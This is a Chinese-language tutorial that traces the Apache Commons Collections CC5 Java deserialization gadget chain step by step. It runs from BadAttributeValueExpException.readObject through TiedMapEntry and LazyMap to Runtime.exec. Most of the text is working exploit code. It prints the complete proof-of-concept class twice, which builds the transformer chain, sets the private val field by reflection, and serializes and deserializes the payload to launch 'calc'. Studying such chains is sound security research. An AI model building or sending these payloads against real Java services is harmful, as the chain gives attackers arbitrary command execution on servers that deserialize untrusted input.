本文直接跟着前面文章写了,没有描述前部分poc的内容
正文看一下cc5的Gadget
Gadget chain:
ObjectInputStream.readObject()
BadAttributevalueExpException.readObject()
TiedMapEntry.toString()
LazyMap.get()
ChainedTransformer.transform()
ConstantTransformer.transform()
InvokerTransformer.transform()
Method.invoke()
Class.getMethod()
InvokerTransformer.transform()
Method.invoke()
Runtime.getRuntime()
InvokerTransformer.transform()
Method.invoke()
Runtime.exec()
跟cc6的Gadget比较了一下发现只有一点点地方不一样
Gadget chain:
ObjectInputStream.readObject()
BadAttributevalueExpException.readObject()
TiedMapEntry.toString()
我们现在的poc为
import org.apache.commons.collections.Transformer;
import org.apache.commons.collections.functors.ChainedTransformer;
import org.apache.commons.collections.functors.ConstantTransformer;
import org.apache.commons.collections.functors.InvokerTransformer;
import org.apache.commons.collections.keyvalue.TiedMapEntry;
import org.apache.commons.collections.map.LazyMap;
import java.io.*;
import java.lang.reflect.Field;
import java.util.HashMap;
import java.util.Map;
public class CommonCollections5 {
public static void main(String[] args) throws IOException, NoSuchFieldException, IllegalAccessException, ClassNotFoundException {
Transformer[] transformers = new Transformer[]{
new ConstantTransformer(Runtime.class),
new InvokerTransformer("getMethod", new Class[]{String.class, Class[].class}, new Object[]{"getRuntime", null}),
new InvokerTransformer("invoke",new Class[]{Object.class,Object[].class},new Object[]{null,null}),
new InvokerTransformer("exec", new Class[]{String.class}, new Object[]{"calc"})
};
ChainedTransformer chainedTransformer = new ChainedTransformer(transformers);
HashMap map = new HashMap<>();
Map lazyMap = LazyMap.decorate(map,chainedTransformer );
TiedMapEntry tiedMapEntry = new TiedMapEntry(lazyMap, "Demodd");
}
public static void serialize(Object obj) throws IOException {
ObjectOutputStream oos = new ObjectOutputStream(new FileOutputStream("ser.bin"));
oos.writeObject(obj);
}
public static Object unserialize(String Filename) throws IOException, ClassNotFoundException {
ObjectInputStream ois = new ObjectInputStream(new FileInputStream(Filename));
Object obj = ois.readObject();
return obj;
}
}
然后我们根据Gadget跟进一下TiedMapEntry的toString方法
发现它调用了getValue
public String toString() {
return getKey() + "=" + getValue();
}
public Object getValue() {
return map.get(key);
}
这样就跟cc6的前半部分的链连起来了,现在可以通过调用TiedMapEntry的toString方法调用getValue进而调用Lazymap.get。
然后我们再看哪里可以调用toString并且最好是一个readObject方法,这样就能直接控制了,然后我们跟着ysoserial找到了这么一个类
BadAttributevalueExpException
看一下他的readObject
private void readObject(ObjectInputStream ois) throws IOException, ClassNotFoundException {
ObjectInputStream.GetField gf = ois.readFields();
Object valObj = gf.get("val", null);
if (valObj == null) {
val = null;
} else if (valObj instanceof String) {
val= valObj;
} else if (System.getSecurityManager() == null
|| valObj instanceof Long
|| valObj instanceof Integer
|| valObj instanceof Float
|| valObj instanceof Double
|| valObj instanceof Byte
|| valObj instanceof Short
|| valObj instanceof Boolean) {
val = valObj.toString();
} else { // the serialized object is from a version without JDK-8019292 fix
val = System.identityHashCode(valObj) + "@" + valObj.getClass().getName();
}
}
val = valObj.toString();
然后我们尝试控制valObj为TiedMapEntry,跟进下发现
ObjectInputStream.GetField gf = ois.readFields();
Object valObj = gf.get("val", null);
我们只要能控制这个val就可以,跟进一下这个val
private Object val;
所以我们可以通过反射修改val的值,这样就理清楚了,我们尝试编写一下poc
先实例化一下这个类
BadAttributevalueExpException badAttributevalueExpException = new BadAttributevalueExpException(null);
利用反射修改私有变量val的值为tiedMapEntry
ClassbadAttributevalueExpExceptionClass = BadAttributevalueExpException.class; Field badAttributevalueExpExceptionClassField = badAttributevalueExpExceptionClass.getDeclaredField("val"); badAttributevalueExpExceptionClassField.setAccessible(true); badAttributevalueExpExceptionClassField.set(badAttributevalueExpException,tiedMapEntry);
总poc为
import org.apache.commons.collections.Transformer;
import org.apache.commons.collections.functors.ChainedTransformer;
import org.apache.commons.collections.functors.ConstantTransformer;
import org.apache.commons.collections.functors.InvokerTransformer;
import org.apache.commons.collections.keyvalue.TiedMapEntry;
import org.apache.commons.collections.map.LazyMap;
import javax.management.BadAttributevalueExpException;
import java.io.*;
import java.lang.reflect.Field;
import java.util.HashMap;
import java.util.Map;
public class CommonCollections5 {
public static void main(String[] args) throws IOException, NoSuchFieldException, IllegalAccessException, ClassNotFoundException {
Transformer[] transformers = new Transformer[]{
new ConstantTransformer(Runtime.class),
new InvokerTransformer("getMethod", new Class[]{String.class, Class[].class}, new Object[]{"getRuntime", null}),
new InvokerTransformer("invoke",new Class[]{Object.class,Object[].class},new Object[]{null,null}),
new InvokerTransformer("exec", new Class[]{String.class}, new Object[]{"calc"})
};
ChainedTransformer chainedTransformer = new ChainedTransformer(transformers);
HashMap map = new HashMap<>();
Map lazyMap = LazyMap.decorate(map, chainedTransformer);
TiedMapEntry tiedMapEntry = new TiedMapEntry(lazyMap, "Demodd");
BadAttributevalueExpException badAttributevalueExpException = new BadAttributevalueExpException(null);
Class badAttributevalueExpExceptionClass = BadAttributevalueExpException.class;
Field badAttributevalueExpExceptionClassField = badAttributevalueExpExceptionClass.getDeclaredField("val");
badAttributevalueExpExceptionClassField.setAccessible(true);
badAttributevalueExpExceptionClassField.set(badAttributevalueExpException,tiedMapEntry);
serialize(badAttributevalueExpException);
unserialize("ser.bin");
}
public static void serialize(Object obj) throws IOException {
ObjectOutputStream oos = new ObjectOutputStream(new FileOutputStream("ser.bin"));
oos.writeObject(obj);
}
public static Object unserialize(String Filename) throws IOException, ClassNotFoundException {
ObjectInputStream ois = new ObjectInputStream(new FileInputStream(Filename));
Object obj = ois.readObject();
return obj;
}
}
